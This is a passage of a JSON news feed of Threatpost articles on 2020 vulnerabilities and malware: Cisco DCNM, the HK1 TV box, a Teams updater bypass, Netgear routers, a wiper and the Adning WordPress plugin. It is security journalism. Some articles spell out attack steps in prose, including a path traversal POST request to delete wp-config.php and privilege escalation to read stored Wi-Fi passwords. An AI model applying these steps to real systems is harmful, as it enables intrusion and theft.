Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:26:03", "description": "Proof-of-concept exploit code has been published for critical flaws impacting the Cisco Data Center Network Manager (DCNM) tool for managing network platforms and switches.\n\nThe three critical vulnerabilities in question (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977) impact DCNM, a platform for managing Cisco data centers that run Cisco\u2019s NX-OS \u2014 the network operating system used by Cisco\u2019s Nexus-series Ethernet switches and MDS-series Fibre Channel storage area network switches.\n\nThe flaws, patched on[ Jan. 3](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>), could allow an unauthenticated, remote attacker to bypass endpoint authentication and execute arbitrary actions with administrative privileges on targeted devices.\n\nFast forward to this week, the security researcher who initially discovered the flaws, Steven Seeley, released public PoC exploits for the flaws.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cIn this post, I share three (3) full exploitation chains and multiple primitives that can be used to compromise different installations and setups of the Cisco DCNM product to achieve unauthenticated remote code execution as SYSTEM/root,\u201d he explained in a [blog post](<https://srcincite.io/blog/2020/01/14/busting-ciscos-beans-hardcoding-your-way-to-hell.html>).\n\n\u201cIn the third chain, I (ab)use the java.lang.InheritableThreadLocal class to perform a shallow copy to gain access to a valid session.\u201d\n\n## The Flaws\n\nTwo of the flaws ([CVE-2019-15975](<https://www.tenable.com/cve/CVE-2019-15975>) and [CVE-2019-15976](<https://www.tenable.com/cve/CVE-2019-15976>)) are authentication bypass vulnerabilities in the REST API and SOAP API endpoints for Cisco DCNM. Representational State Transfer (REST) is an architecture style for designing networked applications, [according to RestFulApi.net;](<https://restfulapi.net/>) while Simple Object Access Protocol (SOAP) is a standard communication protocol system that allows processes using different operating systems (like Linux and Windows) to communicate via HTTP and its XML, according to a [DZone description](<https://dzone.com/articles/difference-between-rest-and-soap-api>). The flaw stems specifically from the existence of a static encryption key shared between REST API and SOAP API installations.\n\nThe third bug ([CVE-2019-15976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15976>)) is described by Cisco as \u201cdata center network manager authentication bypass vulnerability.\u201d This flaw exists in the web-based management interface of the DCNM, allowing an unauthenticated, remote attacker to bypass authentication on an affected device.\n\n## PoC Exploit\n\nSeeley said he was able to exploit the flaw by targeting two different setups of DCNM \u201cbecause some code paths and exploitation techniques were platform specific.\u201d Those two were the Cisco DCNM installer for Windows and DCNM ISO Virtual Appliance for VMWare servers (both were DCNM version 11.2, released June 18, 2019).\n\n> I'm excited to share my post about discovering &amp; exploiting multiple critical vulnerabilities in Cisco's DCNM. \n> \n> Busting Cisco's Beans :: Hardcoding Your Way to Hell <https://t.co/EkwwJ2u195>\n> \n> PoC exploit code:<https://t.co/Xsae7j8xkl><https://t.co/5LxxCEtnRE><https://t.co/8i5u1kLcEi>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [January 14, 2020](<https://twitter.com/steventseeley/status/1217113588294410243?ref_src=twsrc%5Etfw>)\n\nSeeley said that he was able to control all the elements to forge his own token and then use a hardcoded key to generate a Single Sign-On Token (ssoToken), which allowed him to bypass authentication.\n\nFrom there, he could \u201csend a SOAP request to the /DbAdminWSService/DbAdminWS endpoint and add a global admin user that will give us access to all interfaces,\u201d he said.\n\nWith the PoC exploit code now available, Cisco is urging customers to update. The networking giant [released software updates](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass>) patching the vulnerabilities earlier this month,\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerabilities that are described in this advisory,\u201d according to Cisco\u2019s advisory, which was updated on Wednesday.\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-01-16T22:18:51", "type": "threatpost", "title": "Critical Cisco Flaws Now Have PoC Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-01-16T22:18:51", "id": "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "href": "https://threatpost.com/cisco-dcnm-flaw-exploit/151949/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:07:48", "description": "A critical bug in the Hindotech HK1 TV Box would allow root-privilege escalation thanks to improper access control. A successful exploit would allow attackers to steal social-networking account tokens, Wi-Fi passwords, cookies, saved passwords, user-location data, message history, emails, contacts and more, researchers said.\n\nThe bug, which is awaiting a CVE assignment, comes in at 9.3 out of 10 on the [CvSS severity scale](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&version=3.1>), according to researchers at Sick.Codes, a security resource for developers.\n\nThe HK1 Box S905X3 TV Box is an Android-based streaming box that plugs into a TV and allows users to access YouTube, Netflix and other streaming content \u201cover-the-top,\u201d i.e., without a cable subscription. Users can also sign into their favorite email, music and social-networking-related apps for a full \u201csmart TV\u201d experience. It retails for under $100.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nThe vulnerability would allow a local, unprivileged user to escalate to root, the Sick.Codes team said [in a posting](<https://sick.codes/sick-2020-004/>) this week. At issue is a lack of authentication when it comes to the debugging functions of the set-top \u2013 specifically, when connected to the device through the serial port (UART), or while using the [Android Debug Bridge](<https://developer.android.com/studio/command-line/adb>) (adb), as an unprivileged user.\n\nadb is a versatile command-line tool that lets users communicate with a device. It facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that can be used to run a variety of commands on a device.\n\n\u201cA local attacker using adb, or a physical attacker connecting to the device through the UART serial debugging port, is dropped into a shell as the \u2018shell\u2019 user without entering a username or password,\u201d researchers explained. \u201cOnce logged in as the \u2018shell\u2019 user, the attacker can escalate to root using the /sbin/su binary which is group executable (750), or /system/xbin/su which is executable by all users (755).\u201d\n\nOnce endowed with root privileges, the attacker can view any of the information for the apps the user is signed into \u2013 paving the way for stealing access tokens, passwords, contacts and messages and more. Attackers could also use the HK1 Box maliciously to sniff other devices on the same network, usually in a home-networking environment, according to the analysis.\n\n\u201cFor example, once root, the network Wi-Fi password can be read in plain text at /data/misc/wifi/WifiConfigStore.xml,\u201d researchers explained.\n\nThus far, the issue has not been addressed.\n\nThe vendor for the device is the Shenzhen Hindo Technology Co.,Ltd., based just outside of Hong Kong. The researchers were unable to contact the company (and its website, [www.hindotech.com](<http://www.hindotech.com>), was down as of the time of writing). Instead, the researchers submitted a draft advisory to Amlogic, which shares branding with the device in the States \u2013 and received no response.\n\nThreatpost has tried to contact Shenzhen Hindo but has been unsuccessful in reaching the company.\n\nThis is only the latest entertainment-related security bug. Last week, researchers disclosed the [\u2018WarezTheRemote\u2019 attack](<https://threatpost.com/comcast-tv-remote-homes-snooping/159899/>), affecting Comcast\u2019s XR11 voice remote control. A security flaw would allow attackers to remotely snoop in on victims\u2019 private conversations.\n\nThe flaw stems from Comcast\u2019s XR11, a popular voice-activated remote control for cable TV, which has more than 18 million units deployed across the U.S. The remote enables users to say the channel or content they want to watch rather than keying in the channel number or typing to search.\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:36:15", "type": "threatpost", "title": "Authentication Bug Opens Android Smart-TV Box to Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-13T16:36:15", "id": "THREATPOST:DFC75A06F449D25EF03338C5D80C705C", "href": "https://threatpost.com/authentication-bug-android-smart-tv-data-theft/160025/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:44", "description": "COVID-19 has [spurred the use of videoconferencing](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) for businesses worldwide \u2013 and this expanded threat surface has lured attackers like moths to a flame. Adding insult to injury, researchers have recently discovered a workaround for a previous patch issued for Microsoft Teams, that would allow a malicious actor to use the service\u2019s updater function to download any binary or malicious payload.\n\nEssentially, bad actors could hide in Microsoft Teams updater traffic, which has lately been voluminous.\n\n\u201cDue to the noisy nature of the [updater] traffic, there is a possibility that malicious traffic hiding there will evade the analyst\u2019s view or even be added to a list of allowed, and therefore unmonitored, list of applications,\u201d explained Reegun Jayapaul, researcher at Trustwave SpiderLabs, in [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/>) released on Wednesday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile Microsoft tried to cut off this vector as a conduit for remote code execution by restricting the ability to update Teams via a URL, it was not a complete fix, the researcher explained.\n\n\u201cThe updater allows local connections via a share or local folder for product updates,\u201d Jayapaul said. \u201cInitially, when I observed this finding, I figured it could still be used as a technique for lateral movement, however, I found the limitations added could be easily bypassed by pointing to an\u2026SMB share.\u201d\n\nServer Message Block (SMB) protocol is a network file sharing protocol. To exploit this, an attacker would need to drop a malicious file into an open shared folder \u2013 something that typically involves already having network access. However, to reduce this gating factor, an attacker can create a remote rather than local share.\n\n\u201cThis would allow them to download the remote payload and execute rather than trying to get the payload to a local share as an intermediary step,\u201d Jayapaul said.\n\nTrustwave has published a proof-of-concept attack that uses Microsoft Teams Updater to download a payload \u2013 using known, common software [called Samba](<https://threatpost.com/samba-update-patches-two-smb-related-mitm-bugs/128090/>) to carry out remote downloading.\n\nFirst, the researcher configured a Samba server for remote, public access. Then, a payload that supports the updater framework must be crafted and uploaded to a remote Samba server that has been authenticated from the Windows \u201cRun\u201d function.\n\n\u201cAfter a successful setup, I initiated the command execution, downloaded remote payload and executed directly from Microsoft Teams Updater, \u2018Update.exe,'\u201d the researcher explained.\n\n\u201cSince the installation is in the local user Appdata folder, no privileged access is needed,\u201d he added. \u201cAttackers can use this to masquerade the traffic (especially for lateral movement).\u201d\n\nMicrosoft won\u2019t be fixing the problem because \u201cwe determined that this behavior is considered to be by design as we cannot restrict SMB source for \u2013update because we have customers that apparently rely on this (e.g. folder redirection),\u201d the company told Trustwave.\n\nTo avoid or mitigate an attack, users can implement solutions that look for suspicious connections both inbound and outbound; and IT can install Microsoft Teams under the \u201cProgram Files\u201d folder, so an attacker cannot drop and execute the remote payload, according to the researcher. \u201cThis can be carried out by Group policy,\u201d Jayapaul said.\n\nCompanies can also disable any kind of update mechanisms and set a policy that updates should be pushed only by the IT team, he added.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-05T15:47:04", "type": "threatpost", "title": "Microsoft Teams Patch Bypass Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-05T15:47:04", "id": "THREATPOST:D819574E836325FD37CCA2E8B9E979A1", "href": "https://threatpost.com/microsoft-teams-patch-bypass-rce/158043/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:48", "description": "UPDATE\n\nNetgear will not patch 45 router models that are vulnerable to a high-severity remote code execution flaw, the router company revealed last week. However, the company says that routers that won\u2019t receive updates are outdated or have reached EOL (End of Life).\n\nThe [remote code execution vulnerability](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) in question, [which was disclosed June 15](<https://threatpost.com/netgear-zero-day-takeover-routers/156744/>), allows network-adjacent attackers to bypass authentication on vulnerable Netgear routers \u2013 sans authentication. The high-severity flaw affects 79 Netgear Wi-Fi routers and home gateway models \u2013 but Netgear says that 45 of those router models are outside of its \u201csecurity support period.\u201d\n\n\u201cNetgear has provided firmware updates with fixes for all supported products previously disclosed by ZDI and Grimm,\u201d Netgear said in a [press statement](<https://www.tomsguide.com/news/netgear-routers-no-fixes>). \u201cThe remaining products included in the published list are outside of our support window. In this specific instance, the parameters were based on the last sale date of the product into the channel, which was set at three years or longer.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nA full list of the router models that won\u2019t be patched \u2013 as well as those that have fixes being rolled out \u2013 [is available on Netgear\u2019s website](<https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders>).\n\n\u201cWhen we look at support windows, some of our products last five or six years, while others last only a few years,\u201d David Henry, senior vice president of Connected Home products at Netgear, told Threatpost. \u201cWhen we launch a product, as it gets old it goes into End of Life (EOL) and we stop building it and wind down [sales into the channel].\u201d\n\nFor instance, one such Modem Router that won\u2019t receive an update, the AC1450 series, is as old as 2009. Other router models, while newer, have reached EOL: The [R6200 and R6200v2](<https://kb.netgear.com/23748/R6200v2-FAQs>) wireless routers reached EOL in 2013 and 2016, respectively; while the Nighthawk [R7300DST](<https://www.amazon.com/NETGEAR-Nighthawk-Wireless-AC-Gigabit-Adapter/dp/B01HB56E5G>) wireless router reached EOL in the first half of 2017, said Henry.\n\nRegardless, Henry stressed that customers using both newer and older router models stay updated on security updates, as well as adopting best security practices, including turning off features like remote access or changing admin passwords (which he said is enforced by Netgear).\n\n\u201cI think it is really important that customers are paying attention to the updates we send out quarterly on our products,\u201d said Henry.\n\n## **The Flaw **\n\nAccording to the [Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) (ZDI), which first disclosed the issue, the flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer. An attacker can leverage this flaw to execute code in the context of root, according to ZDI.\n\n\u201cGiven the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines,\u201d according to ZDI. \u201cOnly the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting.\u201d\n\nThe flaw was reported to Netgear on Jan. 8, 2020, and on June 15, 2020 the security advisory for the flaw was publicly released without a patch available. Additionally, a PoC exploit was published by the [GRIMM blog on June 15.](<https://blog.grimm-co.com/2020/06/soho-device-exploitation.html>)\n\nNetgear has rolled out patches for 34 of the vulnerable models since the flaw was disclosed. That includes releasing \u201csecurity hotfixes\u201d for the models, which are fixes that are applied on top of existing, fully tested firmware.\n\n\u201cReleasing hotfixes allows Netgear to quickly update existing products and streamline the firmware verification process without going through full regression testing,\u201d according to Netgear. \u201cThese hotfixes are targeted at specific security issues and should have minimal effect on other areas of the product\u2019s code.\u201d\n\n## **Patch Timeline Backlash **\n\nSeveral security experts are criticizing Netgear for its patching policies and procedures. Brian Gorenc, senior director of vulnerability research and head of Trend Micro\u2019s Zero Day Initiative (ZDI) program, told Threatpost that the vulnerabilities disclosed represent some of the most severe bug categories available.\n\n\u201cUnfortunately, there are too many examples of vendors abandoning devices that are still in wide use \u2013 sometimes even when they are still available to purchase,\u201d Gorenc told Threatpost. \u201cMaybe we need to recommend manufacturers who support their products for longer \u2013 especially in our digitally connected lives. If we reward good communications and long-term support from vendors, maybe this abandonment problem will get better.\u201d\n\nZach Varnell, senior AppSec consultant at nVisium, said that the disclosure on this vulnerability \u201cappears to be more than generous since the researcher followed responsible disclosure practices and even gave an extension when asked for it.\u201d\n\n\u201cIt\u2019s unfortunate for anyone who owns one of those routers but that\u2019s the reality of product lifecycles,\u201d said Varnell. \u201cBasically everything \u2013 including software, toys, cars, electronics, appliances \u2013 will reach an age where their manufacturer will no longer support them. The duration of support varies widely and software tends to be on the shorter side since new development is done much more rapidly than hardware.\u201d\n\n\u201cConsumers should always ensure their devices are still supported by manufacturers and check the available support before purchasing a new device,\u201d said Gorenc.\n\nVulnerabilities in routers have been discovered several times over the past year. In March, [Netgear warned users](<https://threatpost.com/critical-netgear-bug-impacts-nighthawk-router/153445/>) of a critical remote code execution bug that could allow an unauthenticated attacker to take control of its Wireless AC Router Nighthawk (R7800) hardware running firmware versions prior to 1.0.2.68. In July, a pair of [flaws in ASUS routers](<https://threatpost.com/asus-home-router-bugs-snooping-attacks/157682/>) for the home were uncovered that could allow an attacker to compromise the devices \u2013 and eavesdrop on all of the traffic and data that flows through them.\n\n_This article was updated on Aug. 4 at 11:30 am ET with further comments from Netgear. _\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2020-08-03T19:03:46", "type": "threatpost", "title": "Netgear Won't Patch 45 Router Models Vulnerable to Serious Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-03T19:03:46", "id": "THREATPOST:9AADE8E4BD604BE3415C6DD56ECA3640", "href": "https://threatpost.com/netgear-wont-patch-45-router-models-vulnerable-to-serious-flaw/157977/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:51", "description": "A new Windows malware has emerged that makes disks unusable by overwriting the master boot record (MBR). It takes its cue from the COVID-19 pandemic, calling itself simply \u201cCoronavirus.\u201d\n\nOverwriting the MBR is the same trick that the infamous NotPetya wiper malware used in 2017 in a campaign that caused widespread, [global financial damage](<https://threatpost.com/pharmaceutical-giant-still-feeling-notpetyas-sting/127130/>).\n\nWorryingly, according to the SonicWall Capture Labs Threat Research team, the fresh malware strain is also a destructive trojan \u2014 though not as destructive as other wipers. And like its namesake, there\u2019s no obvious cure. In [a posting on Tuesday](<https://securitynews.sonicwall.com/xmlpost/coronavirus-trojan-overwriting-the-mbr/>), researchers explained that victims of the Coronavirus trojan find themselves with a gray screen and a blinking cursor with a simple message, \u201cYour computer has been trashed.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe novel coronavirus, and the disease it causes, COVID-19, has provided a depth of fodder for cybercriminals looking to capitalize on the global concern around the pandemic. For instance, a recent spate of phishing attacks has used [the promise of financial relief](<https://threatpost.com/coronavirus-financial-relief-phishing-spike/154358/>) due to the disease as a lure. However, the operator behind this malware takes it one step further, going so far as to take the coronavirus as its name and infection theme.\n\nAs far as that infection routine, the malware can be delivered in any of the usual ways \u2013 as a malicious email attachment, file download, fake application and so on.\n\nUpon execution, the malware starts its process by installing a number of helper files, which are placed in a temporary folder. The malware cleaves tight to its pandemic theme: An installer (a helper file named \u201ccoronavirus.bat\u201d) sets up the attack by creating a hidden folder named \u201cCOVID-19\u201d on the victim machine. The previously dropped helper files are then moved there, in an effort to go unnoticed until its goal is achieved.\n\nAfter that, the installer disables Windows Task Manager and User Access Control (UAC) in a further stab at obfuscation, according to the analysis. It also changes the victim\u2019s wallpaper, and disables options to add or modify that wallpaper after the change is made. It also adds entries in registry for persistence, and then sets about rebooting to finish the installation.\n\nThe process run.exe creates a batch file named run.bat to ensure the registry modifications done by \u201ccoronavirus.bat\u201d are kept intact during the reboot process, according to SonicWall.\n\nAfter reboot, the infection executes two binaries. One, \u201cmainWindow.exe,\u201d displays a window with a picture of the coronavirus itself, with two buttons. At the top of the window, the victim is notified that \u201ccoronavirus has infected your PC!\u201d\n\nThe two buttons read \u201cRemove virus\u201d and \u201cHelp.\u201d The former does nothing when clicked; the latter brings up a pop-up that tells victims to \u201cnot wast [sic] your time\u201d because \u201cyou can\u2019t terminate this process!\u201d\n\nThe other binary carries out the meat of the attack: It\u2019s responsible for overwriting the MBR.\n\n\u201cThe original MBR is first backed up in the first sector before it is overwritten with new one, [and the] MBR is overwritten with the new code,\u201d according to the researchers.\n\nOnce the overwrite is complete, the victim\u2019s display is changed to a simple grey screen delivering the bad news:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/01164031/corona-trojan-grey-screen.png>)\n\nSonicWall told Threatpost in an email interview that it was able to analyze the sample after it was uploaded to VirusTotal. Thus, so far, there haven\u2019t been many instances of \u201cCoronavirus\u201d observed in the wild, and little in known in terms of targeting or what the spreading mechanisms are for the mysterious new malware.\n\nThe team also told Threatpost that the good news is that this is not as dangerous as other wiper strains.\n\n\u201cEven if the MBR is not restored\u2026data can still be accessed/recovered by mounting the drive,\u201d the firm noted. \u201cThe MBR [also] can be potentially restored, but it is not easy and [requires deep technical knowledge](<https://neosmart.net/wiki/fix-mbr/>).\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-01T21:07:22", "type": "threatpost", "title": "Wiper Malware Called \"Coronavirus\" Spreads Among Windows Victims", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-01T21:07:22", "id": "THREATPOST:F18124E38523CE6CF73ACDCF7DBF78BC", "href": "https://threatpost.com/wiper-malware-coronavirus-windows-victims/154368/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:12", "description": "The Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nThe plugin\u2019s author, Tunafish, has rolled out a patched version (v.1.5.6), which site owners should update to as soon as possible. No CVE was issued.\n\nThe bug could allow complete site takeover, earning it a 10 out of 10 on the CVSS bug-severity scale. Also, it has already been the subject of in-the-wild attacks, according to [an analysis](<https://www.wordfence.com/blog/2020/07/critical-vulnerabilities-patched-in-adning-advertising-plugin/>) from Wordfence issued on Wednesday. That said, the firm said the attacks so far have been limited in scope and scale.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaw exists in the Adning plugin\u2019s ability to allow users to upload banner images, researchers said.\n\n\u201cIn order to provide this functionality, it used an AJAX action, _ning_upload_image,\u201d according to the researchers. \u201cUnfortunately, this AJAX action was available with a nopriv_ hook, meaning that any visitor to the site could make use of it, even if they were not logged in. Additionally, the function called by this AJAX action also failed to make use of a capability check or a nonce check.\u201d\n\nThis function also allowed the user to supply the \u201callowed\u201d file types \u2013 which means that an unauthenticated attacker could upload malicious code by sending a POST request to wp-admin/admin-ajax.php.\n\nThis could be performed \u201cwith the action parameter set to _ning_upload_image the allowed_file_types set to php and a files parameter containing a malicious PHP file,\u201d researchers said. \u201cAlternatively, an attacker could set the allowed_file_types to zip and upload a compressed archive containing a malicious PHP file, which would be unzipped after upload.\u201d\n\n## **A Second Bug**\n\nWordfence researchers also found a second security vulnerability, which allows unauthenticated arbitrary file deletion via path traversal.\n\nCarrying a high-severity CVSS score of 8.7, this bug is also patched in v.1.5.6.\n\n\u201cIn order to delete any uploaded images, the plugin also registered another ajax action, _ning_remove_image, which also used a nopriv_ hook,\u201d according to the analysis. \u201cAs with the upload vulnerability, this function did not perform a capability check or a nonce check. As such it was possible for an unauthenticated attacker to delete arbitrary files using path traversal.\u201d\n\nAlso, according to Wordfence, if an attacker were able to delete the specific file wp-config.php, the site would be reset, offering attackers an opportunity to set it up again. They could use their own remote databases under their control, effectively replacing the site\u2019s content with their own content.\n\n\u201cThis might require an extra step of preparation, which is that the wp-content/uploads/path folder would need to exist,\u201d according to Wordfence. \u201cHowever, since the previously mentioned arbitrary file-upload vulnerability allowed for directory creation, this was not a major obstacle. Once the directory was created, an attacker could send a POST request to wp-admin/admin-ajax.php with the action parameter set to _ning_remove_image, the uid parameter set to /../../.. and the src parameter set to wp-config.php.\u201d\n\n## **WordPress Plugins: A Weak Link**\n\nWordPress plugins continue to crop up with concerning vulnerabilities that put sites at risk. In May for instance, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>). Also that month, a pair of security vulnerabilities (one of them critical), in the WordPress search engine optimization (SEO) plugin known as Rank Math, [were found](<https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/>). They could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. RankMath is a WordPress plugin with more than 200,000 installations.\n\nIn March, another critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.\n\nAlso in March, two vulnerabilities \u2013 including a high-severity flaw \u2013 [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to infect malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\nAnd in February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>). The flaw could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical 